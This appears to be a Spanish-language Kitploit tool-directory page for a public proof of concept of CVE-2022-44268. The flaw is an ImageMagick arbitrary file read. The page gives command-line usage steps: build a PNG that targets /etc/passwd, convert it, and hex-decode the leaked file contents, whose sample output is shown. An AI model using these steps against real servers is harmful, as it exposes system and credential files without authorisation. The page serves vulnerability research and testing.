Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
imagemagick-lfi-poc — ImageMagick LFI PoC [CVE-2022-44268] | Kitploit
Herramientas/GitHubGitHub/sybil-scan/imagemagick-lfi-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubsybil-scan/imagemagick-lfi-poc

imagemagick-lfi-poc

ImageMagick LFI PoC [CVE-2022-44268]

Ver Repositorio
539hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ImageMagick LFI PoC [CVE-2022-44268]

Los investigadores de MetabaseQ descubrieron CVE-2022-44268, es decir, ImageMagick 7.1.0-49 es vulnerable a la divulgación de información. Cuando analiza una imagen PNG (por ejemplo, para redimensionar), la imagen resultante podría tener incrustado el contenido de un archivo remoto arbitrario (si el binario de ImageMagick tiene permisos para leerlo).

Uso

  • Asegúrate de tener ImageMagick y los paquetes de Python necesarios instalados.
root@kitploit:~
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png
  • Convierte el archivo PNG generado:
root@kitploit:~
(~)>>> convert exploit.png result.png
  • Lee el contenido del archivo PNG convertido:
root@kitploit:~
(~)>>> identify -verbose result.png
  • Decodifica los datos devueltos en el campo Raw profile type y verás el contenido de /etc/passwd:
root@kitploit:~
(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

Referencias

  • https://www.metabaseq.com/imagemagick-zero-days/
  • https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
Descargar herramienta